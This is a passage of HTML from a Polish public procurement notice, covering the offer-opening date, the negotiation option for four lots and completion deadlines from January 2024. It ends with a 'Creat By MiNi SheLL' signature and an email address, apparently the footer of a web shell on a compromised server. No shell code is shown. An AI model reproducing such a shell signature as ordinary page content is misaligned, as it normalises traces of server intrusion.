class="normal">https://portal.smartpzp.pl/21wog</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-01 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-30</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagany termin wykonania zamówienia:<br/>• dla części zamówienia nr 1 – 10 miesięcy od daty zawarcia umowy, jednak nie wcześniej niż od 02.01.2024 r.;<br/>•	dla części zamówienia nr 2 – 10 miesięcy od daty zawarcia umowy, jednak nie wcześniej niż od 02.01.2024 r.;<br/>•	dla części zamówienia nr 3 – 10 miesięcy od daty zawarcia umowy, jednak nie wcześniej niż od 02.01.2024 r.;<br/>•	dla części zamówienia nr 4 – 10 miesięcy od daty zawarcia umowy, jednak nie wcześniej niż od 02.01.2024 r.;

Creat By MiNi SheLL
Email: jattceo@gmail.com